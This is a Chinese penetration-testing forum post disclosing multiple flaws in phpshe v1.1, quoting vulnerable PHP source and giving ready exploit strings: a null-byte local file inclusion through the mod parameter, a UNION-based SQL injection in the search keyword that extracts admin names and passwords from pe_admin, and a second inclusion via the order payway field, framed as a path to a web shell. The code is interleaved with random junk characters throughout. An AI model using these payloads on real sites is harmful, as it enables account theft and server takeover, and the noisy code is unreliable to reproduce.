找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2491|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/& V3 R, L7 k; c" e
/* Phpshe v1.1 Vulnerability
6 X' O) J* e) K/* ========================
/ {% l$ z5 {& j3 x& I/* By: : Kn1f3
0 h( A$ Z# ^) i# H/* E-Mail : 681796@qq.com) u4 l) l7 F- |9 ]9 i; |
/*******************************************************/0 U- s% g/ d9 R2 q9 l/ D* [
0×00 整体大概参数传输
( i6 r6 m: C8 O2 O& @
; i0 H1 o  a0 @% p$ n) Y+ Q! x" l/ O! Q3 z

+ T- ~3 z% q9 c  [//common.php5 U: P+ X& X: G9 Y2 C8 U) I; b
if (get_magic_quotes_gpc()) {
* ^6 M( F- q# R1 E/ ]! @! F9 L0 p9 v!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');8 D! n% Z, g& _: [- p: n2 @* Z
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');' L. `, B9 Y$ p$ g* E* B
}, \, F0 i% K6 p) k
else {, ~/ `2 _, n2 Y5 Z, k8 q1 S5 x
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
5 F' z# U6 W2 _0 ?1 }6 s& r/ T' E!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
% G5 g2 a% Q) P}' K4 J2 |  ~3 ^& T
session_start();; r0 g8 B3 \& L; f! |8 p
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
& I# u) I5 M7 ^5 r5 J5 u!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
* v/ W$ @" S. ^% u, t% b; l; L- M. K* s- ~+ }) \. Q1 B
0×01 包含漏洞
, Y- N2 Z" ?" B8 l2 w, @ " j( I, u0 J" M4 O0 f. ?1 a1 Z

* n1 a2 p  _0 S9 H" ~8 U//首页文件5 C( q5 P4 F$ Z$ v! V  ?( O
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);3 R% `$ Z/ L3 `" r6 z- |  b6 U
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
. s# Q1 ]& S# O2 o) rpe_result();
' k8 b. ~- e2 M?>& Z. L7 ~; G( Z8 E" |9 {. V- ?
//common 文件 第15行开始
) J5 k; T- v% X: r5 N% T* x1 purl路由配置$ R) p/ m$ O" F' l" D) b
$module = $mod = $act = 'index';! Z. Y# n% B7 v- e
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);6 v2 N0 h% v" O3 Q5 b/ F+ {& {) B
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
" C. N3 o  S! H$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);! ?1 o: M4 s0 `+ V1 P" a/ N
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00. W6 j# t% g# l


9 q; e/ H2 U$ s1 F8 O6 C4 k; V. [ ) \2 r: o) w4 S9 D& A0 B
0×02 搜索注入
! J4 q4 d/ X+ B, h- z ) P/ ~- Y5 T2 }* y  a
<code id="code2">

//product.php文件% X  P3 R1 H( n4 x% {
case 'list':: I# B; S9 P1 Z# r5 T
$category_id = intval($id);
. H3 @7 h( h+ t4 k& L0 P$info = $db->pe_select('category', array('category_id'=>$category_id));; U) L  R$ r  Z: @
//搜索% ]  Y7 K/ j% @: H$ O% \5 H
$sqlwhere = " and `product_state` = 1";
7 G5 Q; D$ A+ X* c1 N) p# S$ Bpe_lead('hook/category.hook.php');& L+ h. J" E, T" c' m
if ($category_id) {9 T( g5 a; g- `2 p0 {3 T7 c
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
1 F$ r" `% c! b' t2 Q9 r" H}7 @3 p8 Z/ z7 g( c
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
: k) C8 ]& w2 O) J4 a/ wif ($_g_orderby) {
5 {5 {/ z5 r% {3 Y3 u$orderby = explode('_', $_g_orderby);$ A6 ]6 A" s3 B# u3 o. P6 j5 X
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
* o: Q6 A$ ~, a* W! g4 D3 i4 w* y}! c" Y( U' r& G$ `2 I' G
else {, x  s/ s1 J  J2 R5 a0 D! B
$sqlwhere .= " order by `product_id` desc";
  y! [/ \4 t4 Q9 [* I' d}/ y& C, _* ~* O9 \1 W
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
/ m( B2 b. i: A//热卖排行
+ p. w  T. i3 C8 x" e* u$product_hotlist = product_hotlist();
$ ]8 o% p  I0 U# {% Y//当前路径
2 C% B# b: a) W7 P$nowpath = category_path($category_id);2 v, c- e2 o2 c! t& d& P; O
$seo = pe_seo($info['category_name']);
+ T$ f* V7 ]+ r. P: k9 {include(pe_tpl('product_list.html'));: J, y$ P9 f8 w. u# u
//跟进selectall函数库
. V, S3 u* e2 A8 r4 @) f/ i/ v3 V# \public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
' ^: |5 m  _0 P5 |! i" U1 L" `& H{
" _8 A* G+ H- Z4 V//处理条件语句, j' Q& R  ?. b- `  ]
$sqlwhere = $this->_dowhere($where);
' h! r' h: p# Z) j5 X1 Creturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
# x( c& L+ z: l, P8 J}
3 x3 W8 h% D0 ], U( d" M//exp4 @6 n+ a  A3 F" Q% y$ Z
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
! w) V6 N2 D; ]% q& D7 d/ u

</code>, P. d% i2 R! S9 K
& g; Y! ^2 d8 Z) w
0×03 包含漏洞25 z3 G9 U# H1 z, w  w" d: L

, ^& ?5 e: M; U; N/ M8 ]: \<code id="code3">

//order.php

case 'pay':

$ t) ~5 B$ y1 r/ Y! N
$order_id = pe_dbhold($_g_id);


+ m( J8 \: _, h# ~8 Y$cache_payway = cache::get('payway');

, Z6 G/ }3 P. l2 D) |9 Y
foreach($cache_payway as $k => $v) {

& y, Q0 l. ~; t
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


4 H. P% Q0 Q0 m8 R# `0 ~& Q  cif ($k == 'bank') {


: j) x2 p: |: D, W9 y' M  c$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


3 d8 X/ w/ M' e5 S: Z}


$ ^0 [1 o+ C: u( o}


, A0 Y0 D5 f  T% o2 L$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


( i3 Q  o2 q! R!$order['order_id'] && pe_error('订单号错误...');

: q: W0 Z2 D/ H3 K: x! L
if (isset($_p_pesubmit)) {

: i9 z2 j. U! q8 E
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

: j$ h' J3 ?3 |8 Y7 V
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

2 r" F6 B) M& f; X! _# K
foreach ($info_list as $v) {


0 J9 s5 I- b: x" e2 c$order['order_name'] .= "{$v['product_name']};";4 \+ {! x* ]( |- M; f/ s! N

) [' w0 j/ d' J( k6 j- Q" i$ U. K
}


0 T4 a& m# P3 U0 M9 u  c, y% _echo '正在为您连接支付网站,请稍后...';

% q$ n* d; a# v' ~/ `! i. t9 s
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


; A5 d; L/ i1 Q* {: h$ o}//当一切准备好的时候就可以进行"鸡肋包含了"


* D# Z! V2 l: U' R! Q& A3 s. ?else {


& E% y  @1 }! ~4 U' wpe_error('支付错误...');

4 v$ z6 x, _  M( F
}

) ~7 S- f1 c+ O- c2 C7 q
}

5 ~6 m* U. v: W% r
$seo = pe_seo('选择支付方式');

* F9 \7 g  J/ E# j
include(pe_tpl('order_pay.html'));

% B) a2 \! B  p; A( W- D1 [
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
4 V8 v3 Q9 B# r$ A/ R+ L( o! @

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表